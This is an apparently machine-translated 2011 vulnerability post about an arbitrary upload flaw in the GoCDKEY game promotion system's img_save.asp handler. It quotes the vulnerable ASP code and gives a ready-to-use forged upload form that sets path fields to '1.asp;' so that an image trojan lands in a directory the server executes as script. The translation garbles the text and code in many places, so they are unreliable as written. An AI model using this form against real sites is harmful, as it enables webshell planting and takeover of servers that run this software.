GoCDKEY game promotion system upload vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201132405
Type myhack58
Reporter 佚名
Modified 2011-11-21T00:00:00


Because of the need to lower the source to see Appear in the\inc\img_save. asp file

set fs=server. CreateObject("scripting. filesystemobject") set upload=new upload_5xSoft "the establishment of the upload object '-------- The date is converted into a file name-------- formPath="/uploadfile/" formpath2=upload. form("type") // a BUG appears here, a type value from the from To get a custom path formPath=formPath&formPath2 //path generation。。。。 uploadfile+type if upload. form("adsrc")="" then adsrc="ADSrc" else adsrc=upload. form("adsrc") end if "In the directory after the(/) if right(formPath,1)<>"/" then formPath=formPath&"/" set file=upload. file("picture") "to generate a file object if file. FileSize>0 then "if FileSize > 0 Description there is a file data if file. filesize>3 0 0 0 0 0 then response. write"<SCRIPT language=JavaScript>alert('uploaded image is greater than a predetermined(300K),please change the file size after the re-upload!');" response. write"javascript:history. back(-1)</SCRIPT>" response. end end if FileExt = Mid(file. Filename, InStrRev(file. Filename, ".")+ 1) FileExt = FixName(FileExt) If Not ( CheckFileExt(FileExt) ) Then response. write"<SCRIPT language=JavaScript>alert('uploading picture only supports gif|jpg|jpeg|bmp|png image files!');" response. write"javascript:history. back(-1)</SCRIPT>" response. end end if

thename=MakedownName()&"."& amp;FileExt 'Start judging members of the picture directory exists Set objFSO = Server. CreateObject("Scripting. FileSystemObject") If objFSO. FolderExists(Server. MapPath(""&amp; formPath&"")) Then'if there is directly save the picture file. SaveAs Server. mappath(formPath&thename) Else objFSO. CreateFolder(Server. MapPath(""&amp; formPath&""))'does not exist on a directory file. SaveAs Server. mappath(formPath&thename)

Set Jpeg = Server. CreateObject("Persits.Jpeg") 'call the component Path = Server. MapPath(formPath&thename) 'to be processed in the image path Jpeg. Open Path If Jpeg. OriginalWidth / Jpeg. OriginalHeight > 1 then Jpeg. Width = 3 5 0 Jpeg. Height = int((3 5 0/Jpeg. OriginalWidth)Jpeg. OriginalHeight) elseif Jpeg. OriginalWidth / Jpeg. OriginalHeight < 1 then Jpeg. Height = 3 5 0 Jpeg. Width= int(Jpeg. OriginalWidth(3 5 0/Jpeg. Height)) end if

Jpeg. Save The Server. MapPath(formPath&thename)

End If Set objFSO = Nothing 'release the FileSystemObject object instance memory space imgs=thename else response. write"<SCRIPT language=JavaScript>alert('uploaded file is empty or file is too large!');" response. write"javascript:history. back(-1)</SCRIPT>" response. end end if

%> <script> //alert("upload successful") var random = Math. random(); window. opener. document. Form1.& lt;%=adsrc%>. value="<%=formpath%><%=imgs%>"; //* returns the path, file name path .... Omitted a million lines.... Down forged form submission pictures of horses

<FORM name=formuppic action=http://www. xxxx. com/inc/img_save. the asp method=post encType=multipart/form-data> <input type="hidden" name="adsrc" value="1. asp;"><input type="hidden" name="type" value="1. asp;"> <TBODY> <TR> <TD>Upload File: <input type=file name="picture"> <INPUT style="FONT-SIZE: 9pt" type=submit value="OK" name=submit> </TD> </TR> </TBODY> </FORM> After uploading it will give the address: window. opener. document. Form1. 1. asp;. value="/uploadfile/1. asp;/2011111990914.jpg";

Author: T00ls-piaoye